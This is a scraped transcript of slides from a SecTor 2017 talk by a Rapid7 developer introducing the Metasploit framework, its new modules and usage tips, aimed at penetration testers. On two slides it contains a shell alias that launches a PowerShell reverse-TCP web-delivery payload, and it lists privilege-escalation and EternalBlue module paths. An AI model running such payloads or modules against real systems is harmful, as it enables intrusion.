Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New...

21
Metasploit Community: Tips, Tricks and What’s New At SecTor 2017

Transcript of Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New...

Page 1: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Metasploit Community:Tips, Tricks and What’s New

At SecTor 2017

Page 2: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Who am I?

Github: jmartin-r7Twitter: @Op3n4M3

Jeffrey Martin

Senior Software Developer @ Rapid7

Page 3: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

The Metasploit Community

Page 4: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

The Agenda

● Intro to Metasploit● What’s New in Metasploit● Quick tips and hints● What’s on the Horizon● Question?

Page 5: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

The Basicsmsfvenom

Meterpreter/ShellBind/Reverse

MsfconsoleModules

Exploit/Post/AuxHandler

Page 6: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Innovating with Metasploit

Page 7: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Modulesmulti/http/struts2_rest_xstream

multi/http/struts2_content_type_ognlexploits/linux/samba/is_known_pipename

exploits/windows/smb/ms17_010_eternalbluepost/windows/gather/credentials/dynazip_log

Page 8: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Named Pipes

Page 9: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Railgun

Page 10: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Packet Encryption

Page 11: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

AggregatorAlice’s Console

Bob’s Console

Shells

Page 12: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

External Module

Console

JSON RPC

Proxy

SOCKS 5

MSF-RPC

Session

ProjectCold Stone

Page 13: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

vm-automationmetasploit-baseline-builder

metasploitable3

Page 14: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?
Page 15: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

You use it, have you done this?

Getting up there quickly:alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"

When it works:post/windows/gather/enum_patchespost/multi/recon/local_exploit_suggester

Page 16: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

You use it, have you done this?

Getting up there quickly:alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"

When it works:post/windows/gather/enum_patchespost/multi/recon/local_exploit_suggester

Page 17: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

You use it, have you done this?

When it doesn’t quite do it:msf> edit

Page 18: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

You use it, have you done this?

When you want more: exploits/windows/local/ms16_032_secondary_logon_handle_privesc exploits/windows/local/bypassuac_fodhelper.rb exploits/windows/local/capcom_sys_exec.rb exploits/windows/local/razer_zwopenprocess.rb

Page 19: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

ProjectGoliath

Database

Database

MetasploitConsole

NMap, EyeWitness, etc

Page 20: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

RubySMB (SMB 1+2)

Page 21: Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New in Metasploit Quick tips and hints What’s on the Horizon Question?

Questions?

● IRCServer - irc.freenode.netChannel - #metasploit

● Blogblog.rapid7.com/tag/metasploit

[email protected]

● Youtubehttps://www.youtube.com/c/MetasploitR7

● New Metasploit.com● COMING SOON

Slack

https://www.youtube.com/c/MetasploitR7

Mastering Metasploit

Mastering Metasploit

Metasploit penetration

Metasploit penetration

Metasploit Completo

Metasploit Completo

Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter

Metasploit Framework Unleashed beyond Metasploit · Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter

Exploitation with Metasploit - Nethemba · PDF file Prologue Metasploit Project Metasploit Framework – open­source platform for exploit developing, testing and using exploit

Exploitation with Metasploit - Nethemba · PDF file Prologue Metasploit Project Metasploit Framework – open­source platform for exploit developing, testing and using exploit

Metasploit Unleashed

Metasploit Unleashed

Örneklerle Metasploit Framework Kullanımı - TD Software · PDF fileÖrneklerle Metasploit Framework Kullanımı Gökay Bekşen 11/28/2010 [Metasploit el kitabı,

Örneklerle Metasploit Framework Kullanımı - TD Software · PDF fileÖrneklerle Metasploit Framework Kullanımı Gökay Bekşen 11/28/2010 [Metasploit el kitabı,

Cpods training-metasploit

Cpods training-metasploit

presentasi Metasploit

presentasi Metasploit

Metasploit framwork

Metasploit framwork

Metasploit Framework Unleashed beyond Metasploit · PDF fileMetasploit Framework Unleashed –beyond Metasploit ... MSF Bind Payload

Metasploit Framework Unleashed beyond Metasploit · PDF fileMetasploit Framework Unleashed –beyond Metasploit ... MSF Bind Payload

Pentest with Metasploit

Pentest with Metasploit

Metasploit Unleashed [Español]

Metasploit Unleashed [Español]

Nexpose/ Metasploit

Nexpose/ Metasploit

Metasploit El Kitabı

Metasploit El Kitabı

Metasploit Tool

Metasploit Tool

Louisville Infosec - Metasploit Class - Fuzzing and Exploit Development with Metasploit

Louisville Infosec - Metasploit Class - Fuzzing and Exploit Development with Metasploit

Users Guide metasploit

Users Guide metasploit

Metasploit FrameworkMetasploit_Framework

Metasploit FrameworkMetasploit_Framework

Curso de Metasploit

Curso de Metasploit